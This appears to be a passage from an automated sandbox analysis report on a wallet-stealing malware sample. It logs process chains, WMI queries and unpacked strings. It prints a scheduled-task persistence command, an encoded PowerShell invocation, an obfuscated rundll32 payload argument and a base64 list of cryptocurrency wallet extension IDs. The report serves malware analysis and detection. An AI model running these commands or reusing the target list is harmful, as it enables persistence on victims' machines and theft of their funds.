\|5CQkOhmAAAA\|1TKr5GsMwYD\|67sDqg8OAAl\|xYmwxC0TNSO\|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8\|AtBQPz8FP\|AFoAeQBPAGL7AEEnAEMAaAA3\|wBVAEsAZwBJ\|i0CWUiD7CjoBP8CAABIg8Qow\|\|MzMxMiUQkGP9IiVQkEEiJTPskCF0BSItEJDBvSIkEJIEBOEhvAL8ISMdEJBAtAet9DoEBEEiDwAGPAd0QgQFASDmWAHMl\|p8DiwwkSAPISF+LwUiLTKsBVHsA\|wPRSIvKigmI9wjrwWYFZUiLBPslYPPwM8lIi1D\|GEg70XQ2SIP\|wiBIiwJIO8L\|dCpmg3hIGHX\|GkyLQFBmQYPvOGt0BxERS3UI\|hEQeBAudAVIi78A69VIi0j9AMH+agBAU1VWV0FUv0FVQVZBV10BZv+BOU1aTYv4TP+L8kiL2Q+F\|P7z8ExjSTxBgTz\|CVBFAAAPheq+8\|BBi4QJiPPwhf\|ASI08AQ+E1t5qEYO8CYwtAQ+E\|cfz8ESLZyBEi\|9fHIt3JESLT\|8YTAPhTAPZSP8D8TPJRYXJD\|uEpPPwTYvEQYv\|EEUz0kgD04r\|AoTAdB1BwcrvDQ++wPoAAUQD\|dC\|EXXsQYH6qv\|8DXx0DoPBAf9Jg8AEQTvJc\|9p68aLwQ+3DP9ORYssi0wD6+90WDPtqhB0UUH7ixTBANMzyYoCf0yLwusPwcnIEXsDyOUQAUGKANUQ\|+0zwDP2QTsM+bbgEKYAg8YBg\|j\|CHLu6wpIi8v\|Qf\|VSYkE94P9xeQQxAQ7bxhy\|a9mAUFfQV5BXb9BXF9eXVszF0jvgexgAWQAi+no\|2b+\|\|9IhcAPW4SYdSBMja8BiysQ38gz\|+ibfSCNX\|8ETI1FRjPSi9\|L\|1QkaIAgTIuv4A+Ea3UgRagQM\|fAi9ORIEiJfCT1IKYgcIAgSIvwD\|OES3UgpiBQSI1W\|whEjUdASI2M\|SSFEUiL2Oh8\|a5+II1WSN4gEOIhzPbz8Ohn7yBEiwaN01cIQSCmIFjKIYmEaySAhxLe8\|CLDtogj1iJjCRxEQcwkSDo7THvIIucLTJMi12\|OkiD+2xIiiAw\|0yJZCQ4TIuk7hoyTIlchAGEJNy2hxGGko0RjUdLMIz7JPDz8EmL1Ojp7fwFMIqceDJIjYT+eDJBgPMhjU9s90QwGKQCg+kBdffzgbx4MiFSZXi\|dU2LhCT0IjGU+yT4NQHCSDvYcv84g\|psdjNEjXtJQPoAlEG4AJgAeqYgQMoi+HQZRLYwvsAxSY1UJGyRIEnfg+hs6GuCMEiL\|c6mIHhIhf90Es+LVUJMjjAbMUiN\|0wkQP\|XSIHEAHQhYSQtCC0B
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\dllhost.exe
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Users\user\AppData\Local\Temp\Library.exe "C:\Users\user\AppData\Local\Temp\Library.exe"
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5980 -s 648
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
Source: C:\Users\user\AppData\Local\Temp\Library.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAOQAwAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\336E.exe C:\Users\user\AppData\Local\Temp\336E.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2560.exe C:\Users\user\AppData\Local\Temp\2560.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\226F.exe C:\Users\user\AppData\Local\Temp\226F.exe
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\2560.exe	Process created: C:\Users\user\AppData\Local\Temp\2560.exe C:\Users\user\AppData\Local\Temp\2560.exe
Source: C:\Users\user\AppData\Local\Temp\226F.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe
Source: C:\Users\user\AppData\Local\Temp\226F.exe	Process created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SYSWOW64\fontview.exe
Source: C:\Windows\SysWOW64\fontview.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming\nsis_uns5aa2a3.dll",PrintUIEntry \|5CQkOhmAAAA\|1TKr5GsMwYD\|67sDqg8OAAl\|xYmwxC0TNSO\|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8\|AtBQPz8FP\|AFoAeQBPAGL7AEEnAEMAaAA3\|wBVAEsAZwBJ\|i0CWUiD7CjoBP8CAABIg8Qow\|\|MzMxMiUQkGP9IiVQkEEiJTPskCF0BSItEJDBvSIkEJIEBOEhvAL8ISMdEJBAtAet9DoEBEEiDwAGPAd0QgQFASDmWAHMl\|p8DiwwkSAPISF+LwUiLTKsBVHsA\|wPRSIvKigmI9wjrwWYFZUiLBPslYPPwM8lIi1D\|GEg70XQ2SIP\|wiBIiwJIO8L\|dCpmg3hIGHX\|GkyLQFBmQYPvOGt0BxERS3UI\|hEQeBAudAVIi78A69VIi0j9AMH+agBAU1VWV0FUv0FVQVZBV10BZv+BOU1aTYv4TP+L8kiL2Q+F\|P7z8ExjSTxBgTz\|CVBFAAAPheq+8\|BBi4QJiPPwhf\|ASI08AQ+E1t5qEYO8CYwtAQ+E\|cfz8ESLZyBEi\|9fHIt3JESLT\|8YTAPhTAPZSP8D8TPJRYXJD\|uEpPPwTYvEQYv\|EEUz0kgD04r\|AoTAdB1BwcrvDQ++wPoAAUQD\|dC\|EXXsQYH6qv\|8DXx0DoPBAf9Jg8AEQTvJc\|9p68aLwQ+3DP9ORYssi0wD6+90WDPtqhB0UUH7ixTBANMzyYoCf0yLwusPwcnIEXsDyOUQAUGKANUQ\|+0zwDP2QTsM+bbgEKYAg8YBg\|j\|CHLu6wpIi8v\|Qf\|VSYkE94P9xeQQxAQ7bxhy\|a9mAUFfQV5BXb9BXF9eXVszF0jvgexgAWQAi+no\|2b+\|\|9IhcAPW4SYdSBMja8BiysQ38gz\|+ibfSCNX\|8ETI1FRjPSi9\|L\|1QkaIAgTIuv4A+Ea3UgRagQM\|fAi9ORIEiJfCT1IKYgcIAgSIvwD\|OES3UgpiBQSI1W\|whEjUdASI2M\|SSFEUiL2Oh8\|a5+II1WSN4gEOIhzPbz8Ohn7yBEiwaN01cIQSCmIFjKIYmEaySAhxLe8\|CLDtogj1iJjCRxEQcwkSDo7THvIIucLTJMi12\|OkiD+2xIiiAw\|0yJZCQ4TIuk7hoyTIlchAGEJNy2hxGGko0RjUdLMIz7JPDz8EmL1Ojp7fwFMIqceDJIjYT+eDJBgPMhjU9s90QwGKQCg+kBdffzgbx4MiFSZXi\|dU2LhCT0IjGU+yT4NQHCSDvYcv84g\|psdjNEjXtJQPoAlEG4AJgAeqYgQMoi+HQZRLYwvsAxSY1UJGyRIEnfg+hs6GuCMEiL\|c6mIHhIhf90Es+LVUJMjjAbMUiN\|0wkQP\|XSIHEAHQhYSQtCC0B
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\dllhost.exe
Source: C:\Windows\System32\dllhost.exe	Process created: C:\Users\user\AppData\Local\Temp\Library.exe "C:\Users\user\AppData\Local\Temp\Library.exe"
Source: C:\Users\user\AppData\Local\Temp\Library.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAOQAwAA==

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\fontview.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\fontview.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\336E.tmp

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\Library.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Windows\SysWOW64\fontview.exe

Process created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Roaming\nsis_uns5aa2a3.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8FP|AFoAeQBPAGL7AEEnAEMAaAA3|wBVAEsAZwBJ|i0CWUiD7CjoBP8CAABIg8Qow||MzMxMiUQkGP9IiVQkEEiJTPskCF0BSItEJDBvSIkEJIEBOEhvAL8ISMdEJBAtAet9DoEBEEiDwAGPAd0QgQFASDmWAHMl|p8DiwwkSAPISF+LwUiLTKsBVHsA|wPRSIvKigmI9wjrwWYFZUiLBPslYPPwM8lIi1D|GEg70XQ2SIP|wiBIiwJIO8L|dCpmg3hIGHX|GkyLQFBmQYPvOGt0BxERS3UI|hEQeBAudAVIi78A69VIi0j9AMH+agBAU1VWV0FUv0FVQVZBV10BZv+BOU1aTYv4TP+L8kiL2Q+F|P7z8ExjSTxBgTz|CVBFAAAPheq+8|BBi4QJiPPwhf|ASI08AQ+E1t5qEYO8CYwtAQ+E|cfz8ESLZyBEi|9fHIt3JESLT|8YTAPhTAPZSP8D8TPJRYXJD|uEpPPwTYvEQYv|EEUz0kgD04r|AoTAdB1BwcrvDQ++wPoAAUQD|dC|EXXsQYH6qv|8DXx0DoPBAf9Jg8AEQTvJc|9p68aLwQ+3DP9ORYssi0wD6+90WDPtqhB0UUH7ixTBANMzyYoCf0yLwusPwcnIEXsDyOUQAUGKANUQ|+0zwDP2QTsM+bbgEKYAg8YBg|j|CHLu6wpIi8v|Qf|VSYkE94P9xeQQxAQ7bxhy|a9mAUFfQV5BXb9BXF9eXVszF0jvgexgAWQAi+no|2b+||9IhcAPW4SYdSBMja8BiysQ38gz|+ibfSCNX|8ETI1FRjPSi9|L|1QkaIAgTIuv4A+Ea3UgRagQM|fAi9ORIEiJfCT1IKYgcIAgSIvwD|OES3UgpiBQSI1W|whEjUdASI2M|SSFEUiL2Oh8|a5+II1WSN4gEOIhzPbz8Ohn7yBEiwaN01cIQSCmIFjKIYmEaySAhxLe8|CLDtogj1iJjCRxEQcwkSDo7THvIIucLTJMi12|OkiD+2xIiiAw|0yJZCQ4TIuk7hoyTIlchAGEJNy2hxGGko0RjUdLMIz7JPDz8EmL1Ojp7fwFMIqceDJIjYT+eDJBgPMhjU9s90QwGKQCg+kBdffzgbx4MiFSZXi|dU2LhCT0IjGU+yT4NQHCSDvYcv84g|psdjNEjXtJQPoAlEG4AJgAeqYgQMoi+HQZRLYwvsAxSY1UJGyRIEnfg+hs6GuCMEiL|c6mIHhIhf90Es+LVUJMjjAbMUiN|0wkQP|XSIHEAHQhYSQtCC0B

Source: 16.3.226F.exe.d030000.1.unpack, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
Source: 16.3.226F.exe.d030000.0.unpack, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
Source: 18.2.ngentask.exe.400000.0.unpack, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRv